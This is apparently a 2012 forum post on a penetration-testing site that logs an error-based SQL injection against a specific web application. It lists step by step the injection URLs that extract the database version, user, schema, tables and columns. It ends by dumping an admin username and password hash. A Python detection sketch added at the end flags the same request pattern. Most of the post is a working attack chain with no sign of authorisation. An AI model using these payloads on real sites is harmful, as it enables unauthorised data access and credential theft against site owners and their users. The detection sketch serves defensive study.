China Network Penetration Testing Alliance
Title: PHP + MySQL advanced error-based injection, tested and confirmed working
Author: admin
Time: 2012-9-13 17:52
http://www.wooyun.org/bugs/wooyun-2010-01666
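I had been looking for something to test this on and did not expect to find it here; this is just a test run and a record of it.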
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
/data0/htdocs/leqi_new/app/myapp.php
or
/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********user()**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********database()**********/ leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********enumerate the databases one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test
/**********enumerate the table names one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users
/**********enumerate the column names one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 341 351 361
/**********dump data**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd
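
A detection sketch for the request pattern recorded above, added here as an example and not part of the original post: it URL-decodes a request path and flags the count(*) / floor(rand(0)*2) / group by combination that every request on this page shares. The function names, verdict labels and sample paths are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Signature of the requests recorded above: count(*) grouped by a column that
# is built from floor(rand(0)*2), which forces MySQL's duplicate-key error.
FLOOR_RAND = re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)")
COUNT_STAR = re.compile(r"count\s*\(\s*\*\s*\)")
GROUP_BY = re.compile(r"\bgroup\s+by\b")
SCHEMA = re.compile(r"\binformation_schema\.(tables|columns|schemata)\b")


def normalise(raw_url):
    """Undo up to three layers of URL encoding, lower-case, collapse spaces."""
    text = raw_url
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return re.sub(r"\s+", " ", text.lower())


def classify(raw_url):
    """Return 'error-based-sqli', 'suspicious' or 'clean' for one request URL."""
    text = normalise(raw_url)
    core = bool(FLOOR_RAND.search(text) and GROUP_BY.search(text))
    if core and COUNT_STAR.search(text):
        return "error-based-sqli"
    if core or (SCHEMA.search(text) and "select" in text):
        return "suspicious"
    return "clean"


# Constructed request paths (not taken from a real log); the second and third
# reuse the shape of the requests on this page.
SAMPLES = [
    "/download/downpage/netarea/id/1600003/wapc/5000_0005_003",
    "/download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),"
    "concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables"
    "+group+by+x)a)%23/wapc/5000_0005_003",
    "/download/downpage/netarea/id/1600003%27%20OR%201=(SELECT%201%20FROM%20(SELECT"
    "%20COUNT(*),CONCAT(USER(),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables"
    "%20GROUP%20BY%20x)a)%23",
    "/search?q=how+to+group+by+in+mysql",
    "/docs?q=select+table_name+from+information_schema.tables",
]

if __name__ == "__main__":
    for path in SAMPLES:
        print(f"{classify(path):17} {path[:70]}")
```

A match here is a triage signal for access-log review or a WAF rule; it does not replace parameterised queries and disabling the display of database errors in the application.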